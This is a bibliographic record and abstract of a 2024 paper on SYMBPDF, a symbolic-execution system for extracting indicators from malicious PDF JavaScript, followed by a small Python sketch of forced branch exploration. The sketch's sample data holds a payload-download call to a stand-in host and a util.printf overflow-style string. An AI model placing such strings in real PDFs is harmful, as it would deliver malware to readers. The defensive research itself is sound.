
PDF Malicious Indicator Extraction Technique Based on Improved Symbolic Execution

Malicious PDF documents are a common attack vector used by APT groups, and extracting and analyzing indicators from their embedded JavaScript code is an important means of determining whether a document is malicious. However, attackers can evade analysis through heavy obfuscation and through virtual machine and sandbox detection. This paper therefore applies symbolic execution to PDF indicator extraction. We propose a PDF malicious indicator extraction technique based on improved symbolic execution and implement SYMBPDF, an indicator extraction system consisting of three modules: code parsing, symbolic execution, and indicator extraction. The code parsing module extracts and reassembles the embedded JavaScript code. The symbolic execution module uses a code rewriting method that forces branch transfers to raise the code coverage of symbolic execution, together with a concurrency strategy and two constraint-solving optimizations to improve execution efficiency. The indicator extraction module consolidates and records the malicious indicators. Evaluated on 1,271 malicious samples, SYMBPDF achieves an indicator extraction success rate of 92.2% and an indicator effectiveness of 91.7%; compared with the system before optimization, code coverage improves by 8.5% and system performance by 32.3%.
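The idea of forcing branch transfers can be illustrated with a minimal sketch. It is not SYMBPDF's rewriting method, which the abstract does not describe in detail, and it does not perform symbolic execution or constraint solving. It assumes a toy program representation (`emit` and `if` tuples), a hypothetical URL-only indicator pattern, and an invented sample; the point is only that an evasion check such as a viewer-version test no longer hides the indicator once both sides of every conditional are explored.

```python
import re

# Hypothetical indicator pattern: only http(s) URLs count as indicators here.
URL_RE = re.compile(r"https?://[^\s'\"]+")


def explore(block):
    """Return every execution path through `block`, forcing both sides of each `if`.

    A block is a list of statements. Each statement is either
    ("emit", text) or ("if", condition_text, then_block, else_block).
    The condition text is never evaluated, which is the point of forcing.
    """
    paths = [[]]
    for stmt in block:
        kind = stmt[0]
        if kind == "emit":
            paths = [path + [stmt[1]] for path in paths]
        elif kind == "if":
            _, _condition, then_block, else_block = stmt
            paths = [
                path + tail
                for path in paths
                for branch in (then_block, else_block)
                for tail in explore(branch)
            ]
        else:
            raise ValueError(f"unknown statement kind: {kind!r}")
    return paths


def extract_indicators(block):
    """Collect the URL indicators that appear on any forced path."""
    found = set()
    for path in explore(block):
        for text in path:
            found.update(URL_RE.findall(text))
    return sorted(found)


# Invented sample: the download only happens when the evasion check fails.
SAMPLE = [
    ("if", "app.viewerVersion < 9",
     [("emit", "app.alert('nothing to see')")],
     [("emit", "this.getURL('http://malicious.example/payload.bin')")]),
    ("emit", "util.printf('%45000f', 1.0)"),
]

if __name__ == "__main__":
    for url in extract_indicators(SAMPLE):
        print(url)
```

In this toy model the number of paths doubles with each sequential conditional, which suggests why efficiency measures such as concurrency and cheaper constraint solving matter for a practical system.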

Malicious documents; JavaScript code; Indicator extraction; Symbolic execution; Code rewriting; Constraint solving optimization

Song Enzhou (宋恩舟), Hu Tao (胡涛), Yi Peng (伊鹏), Wang Wenbo (王文博)


National Digital Switching System Engineering & Technological R&D Center, Zhengzhou 450001


General Program of the National Natural Science Foundation of China (No. 62176264)

2024

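Computer Science (计算机科学)
Chongqing Southwest Information Co., Ltd. (formerly the Southwest Information Center of the Ministry of Science and Technology)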


Indexed in: CSTPCD; Peking University Core Journals
Impact factor: 0.944
ISSN: 1002-137X
Year, volume (issue): 2024, 51(7)